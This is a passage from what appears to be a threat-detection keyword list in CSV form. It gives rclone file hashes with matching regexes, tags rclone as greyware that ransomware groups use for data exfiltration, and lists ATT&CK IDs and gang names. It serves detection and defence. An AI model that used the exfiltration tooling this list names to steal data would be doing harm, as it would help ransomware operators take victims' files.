Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*09a4130590a298593cd3685484703c60c9e4981ae795885e800ecf6c90d02f71*",".{0,1000}09a4130590a298593cd3685484703c60c9e4981ae795885e800ecf6c90d02f71.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*09a433cb1c6cdbf2f851487e969a462ee015856af50e1e88e9298d9472040187*",".{0,1000}09a433cb1c6cdbf2f851487e969a462ee015856af50e1e88e9298d9472040187.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*09cbf17e7d795725b162f94d0f3234c5782200c691a76fab4b3e026cd2e1d691*",".{0,1000}09cbf17e7d795725b162f94d0f3234c5782200c691a76fab4b3e026cd2e1d691.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*09e0a6d142c1b6961d1b632542319dc33b97d66a6c625c7088cde89c62b4ed26*",".{0,1000}09e0a6d142c1b6961d1b632542319dc33b97d66a6c625c7088cde89c62b4ed26.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0a4d45de276a41b9c54290e68e9456d2f755914b8e30109b329383717daff59a*",".{0,1000}0a4d45de276a41b9c54290e68e9456d2f755914b8e30109b329383717daff59a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0a7a6426d5e23cad778a82f4a7b0697350b2e4d7adb5ac55db63356406f399fc*",".{0,1000}0a7a6426d5e23cad778a82f4a7b0697350b2e4d7adb5ac55db63356406f399fc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0a80ed2036c5a15822118f892272d819010c0f6b0856d8c4360bb1f8c5039c46*",".{0,1000}0a80ed2036c5a15822118f892272d819010c0f6b0856d8c4360bb1f8c5039c46.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0ad89df3db2ab0dbbfe6e7e0f943d7c57154119d1f8c3be80b7254780ab7c5ac*",".{0,1000}0ad89df3db2ab0dbbfe6e7e0f943d7c57154119d1f8c3be80b7254780ab7c5ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0b44e69ab4b77120146dc0e8373afc0fdd09889eea1e8bea172ff97a0213730d*",".{0,1000}0b44e69ab4b77120146dc0e8373afc0fdd09889eea1e8bea172ff97a0213730d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0ba22bd4f6df92dbc7692a669d8663300d99d7a74275903d3054c8a9fb4c6522*",".{0,1000}0ba22bd4f6df92dbc7692a669d8663300d99d7a74275903d3054c8a9fb4c6522.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0baadab16b2bd3ed7d10d966255c362e0710beaf24ef777f63a27e41e0983079*",".{0,1000}0baadab16b2bd3ed7d10d966255c362e0710beaf24ef777f63a27e41e0983079.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0bad6f375d4fbe97b07720bf4d81767cd51fdd09acec6ee64399fd902704599b*",".{0,1000}0bad6f375d4fbe97b07720bf4d81767cd51fdd09acec6ee64399fd902704599b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0be41303879df031d5f222dad7db73011d7b3753a39840380211767037a8a310*",".{0,1000}0be41303879df031d5f222dad7db73011d7b3753a39840380211767037a8a310.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0c6765d8b03582b3f474770d4bedd235792a896d079c541b75d1757807daae1c*",".{0,1000}0c6765d8b03582b3f474770d4bedd235792a896d079c541b75d1757807daae1c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0c74d8fb887691e04e865e3b6bc32e8af47c3e54a9922ffdbed38c8323e281c9*",".{0,1000}0c74d8fb887691e04e865e3b6bc32e8af47c3e54a9922ffdbed38c8323e281c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0c7d97d7909d08d4423b444bd4e475eb863dc9c57bbe002c770cb15e915aa8c1*",".{0,1000}0c7d97d7909d08d4423b444bd4e475eb863dc9c57bbe002c770cb15e915aa8c1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0c8170f2892a5479618553897c042024ab2058af5e4255a46c0ba63deb1727d0*",".{0,1000}0c8170f2892a5479618553897c042024ab2058af5e4255a46c0ba63deb1727d0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0cbf79a249738f27da092c9cfd1d97fc2a533ee1f15553f4ad3d9606145fea30*",".{0,1000}0cbf79a249738f27da092c9cfd1d97fc2a533ee1f15553f4ad3d9606145fea30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0ccd8d079be2eda18c896a8776b982a0a9e2d7b59e3764a150dd22bf54b9cf55*",".{0,1000}0ccd8d079be2eda18c896a8776b982a0a9e2d7b59e3764a150dd22bf54b9cf55.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0cdca1cfe564a433a8c32d514a25dc86d35c29a28511878834e825f4a333c29d*",".{0,1000}0cdca1cfe564a433a8c32d514a25dc86d35c29a28511878834e825f4a333c29d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0ce4d8b829709b17c098e5405ddfb62e1c7fb4d7a7abcc58424f97a75d86419e*",".{0,1000}0ce4d8b829709b17c098e5405ddfb62e1c7fb4d7a7abcc58424f97a75d86419e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0d04bf172b67dd122712b067dbd1e53f958c4ef8c54490d907ca86c7e666b7ec*",".{0,1000}0d04bf172b67dd122712b067dbd1e53f958c4ef8c54490d907ca86c7e666b7ec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0d0522c91a58990fb696342ab2b03ef6ae1585cc0e37d358d36edcc567dfdab6*",".{0,1000}0d0522c91a58990fb696342ab2b03ef6ae1585cc0e37d358d36edcc567dfdab6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0d29aadf342a6962c930d7291fc266bd4bb87756c3b96bc4a8d8589de59f22eb*",".{0,1000}0d29aadf342a6962c930d7291fc266bd4bb87756c3b96bc4a8d8589de59f22eb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0d8bf8b7460681f7906096a9d37eedecc5a1d1d3ad17652e68f0c6de104c2412*",".{0,1000}0d8bf8b7460681f7906096a9d37eedecc5a1d1d3ad17652e68f0c6de104c2412.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0d92df6cbf264c19eeae098f67a24215e131e63c981116732be537600856f9c1*",".{0,1000}0d92df6cbf264c19eeae098f67a24215e131e63c981116732be537600856f9c1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0dfc977e19f814b462af81a7d493d16dcbd8c55ac584eb75da6654a9bb885050*",".{0,1000}0dfc977e19f814b462af81a7d493d16dcbd8c55ac584eb75da6654a9bb885050.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0e086b861b0e4276718da0db900f80377403e367ca03a3a62f7c44ff909556f6*",".{0,1000}0e086b861b0e4276718da0db900f80377403e367ca03a3a62f7c44ff909556f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0e13e574f88a370641aa5e135c7923e8c93d0f6c4c9b29eb31de632316122bb0*",".{0,1000}0e13e574f88a370641aa5e135c7923e8c93d0f6c4c9b29eb31de632316122bb0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0e21c6d9e3ae30e6970c8e72c062ea7f1802b02312bd30724c4be3ecda95e52f*",".{0,1000}0e21c6d9e3ae30e6970c8e72c062ea7f1802b02312bd30724c4be3ecda95e52f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0e5bf235710c87db0a36bee78ea089763fb9c36f185bb091a4a6531dc593b9c5*",".{0,1000}0e5bf235710c87db0a36bee78ea089763fb9c36f185bb091a4a6531dc593b9c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0e6c4d76115e7b8e50833dfa1e3c7dc6424b6c0ad9e18eea7045fea15bdf0218*",".{0,1000}0e6c4d76115e7b8e50833dfa1e3c7dc6424b6c0ad9e18eea7045fea15bdf0218.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0e9acc45b0cca73003b640425e8722b9806c2871f4f8c8fcd043e097fccb70c6*",".{0,1000}0e9acc45b0cca73003b640425e8722b9806c2871f4f8c8fcd043e097fccb70c6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0ed1b55766d583abf21381c9af62cc7cd3f311f22f0773dfe77d8e49b14c2e67*",".{0,1000}0ed1b55766d583abf21381c9af62cc7cd3f311f22f0773dfe77d8e49b14c2e67.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0ed2b004423a9c389f8a3bb107677d8cf79cb2f35e3eab6ef87e205dda44934e*",".{0,1000}0ed2b004423a9c389f8a3bb107677d8cf79cb2f35e3eab6ef87e205dda44934e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*0f29be687222d2931d67956a4f7bb2bea4427c8529f86dda4125fa936d380430*",".{0,1000}0f29be687222d2931d67956a4f7bb2bea4427c8529f86dda4125fa936d380430.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 